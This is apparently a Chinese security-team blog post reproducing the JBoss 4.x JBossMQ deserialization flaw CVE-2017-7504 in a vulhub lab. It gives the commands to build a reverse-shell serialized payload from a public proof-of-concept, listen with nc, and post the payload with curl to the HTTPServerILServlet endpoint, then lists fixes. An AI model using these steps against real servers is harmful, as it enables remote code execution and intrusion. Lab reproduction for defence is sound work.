暂无图片
暂无图片
暂无图片
暂无图片
暂无图片

漏洞复现|CVE-2017-7504 JBoss 4.x JBossMQ JMS 反序列化漏洞

灼剑安全团队 2021-08-31
2915


关注上方蓝字关注我们


0x00 前言

JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。

影响范围:JBoss AS 4.x及之前版本。

0x01 环境准备

1.1 目标环境

    靶机:

vulhub靶场环境:CVE-2017-7504

ip:192.168.28.130

1.2 POC下载

下载地址:https://github.com/joaomatosf/JavaDeserH2HC

0x03 漏洞利用

3.1 使用poc生成一个二进制文件


进入JavaDeserH2HC目录下执行

javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java

3.2 设置监听ip和端口

java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 攻击机IP:监听端口

3.3 nc监听刚才设置的监听端口

3.4 发送payload(在JavaDeserH2HC目录下执行)


漏洞位置:/jbossmq-httpil/HTTPServerILServlet

发送payload:

curl http://192.168.49.128:8080/jbossmq-httpil/HTTPServerILServlet --data-binary @ReverseShellCommonsCollectionsHashMap.ser


0x04 修复建议

1、升级到JBOSS AS7。

2、临时解决方案:

(1)不需要 http-invoker.sar 组件的用户可直接删除此组件。

(2)添加如下代码至 http-invoker.sar 下 web.xml 的 security-constraint 标签中:<url-pattern>/*</url-pattern>用于对 http invoker 组件进行访问控制。


☆ END ☆

长按关注

灼剑(Tsojan)安全团队



点个在看你最好看



文章转载自灼剑安全团队,如果涉嫌侵权,请发送邮件至:contact@modb.pro进行举报,并提供相关证据,一经查实,墨天轮将立刻删除相关内容。

评论